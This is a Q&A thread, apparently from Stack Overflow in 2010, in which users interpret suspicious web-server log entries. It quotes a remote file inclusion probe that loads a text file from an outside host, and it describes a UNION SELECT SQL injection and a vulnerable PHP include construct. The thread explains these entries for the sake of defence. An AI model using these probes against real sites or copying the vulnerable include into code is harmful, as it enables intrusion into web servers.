The x=19&y=15 looks like you have a form on your site with method=get and an input type=image. Do you log referrer?
Martin Smith
2010-05-04 17:39:53
+4
A:
We have forms, but not off the root path like that.... unless our web guy has experiments laying around. i dont think that any of the forms have image types, but thanks for the info. we do log referrer, but i am still looking for that because im locked out of aw stats in cpanel
CheeseConQueso
2010-05-04 17:52:52
Whatever it seems pretty innocuous compared to the other 2 entries!
Martin Smith
2010-05-04 19:07:54
A:
/?id=http://nic.bupt.edu.cn/media/j1.txt?? looks like some sort of cross-site stuff, a useless one because it loads a plain text file O_O
Alfabravo
2010-05-04 17:42:48
The php scripts are text files as many others. The thing is: that particular request points to a plain text file which is not *executed* by any browser, plugin or application (besides gedit or notepad... or shown by the browser as a sequence of characters disposed in a certain order).
Alfabravo
2010-05-04 20:44:56
+5
A:
These (except for the top one) are automated(?) attempts to find weaknesses in the code;
/?id=http://nic.bupt.edu.cn/media/j1.txt??
Tries to import a PHP page from another server. A well-known problem especially with older PHP software.
The "UNION ALL SELECT 1" is an obvious SQL insertion attempt. schema ID 0x73636363726F6F745F7075626C6963 decodes to "scccroot_public". I'm not sure for which database this is. But they are trying to take control of it, that's sure.
wump
2010-05-04 17:43:10
awesome, thanks for the info... scccroot_public is our public db and we only have a user with select privs.... will this person/bot still be able to claim itself as a dba?
CheeseConQueso
2010-05-04 17:53:57
One of the interesting things to note about this UNION query is that it apparently only works because you have a query where you check for a number without using quotes. If you always surround arguments to be checked with quotes, along with proper data escaping and sanitization (such as `mysql_real_escape_string()`), then you shouldn't be vulnerable to this sort of thing. As it stands, though, without using quotes around the numerical argument in your query, even running a typical sanitization routine like mysql_real_escape_string won't help.
Dereleased
2010-05-04 18:21:54
There's plenty of moronic unzip-and-get-pwned templating scripts out there. Most likely one (or more) has a `<?php include($_GET['id']) ?>` construct in it for which this attacker is probing.
Marc B
2010-05-05 03:05:28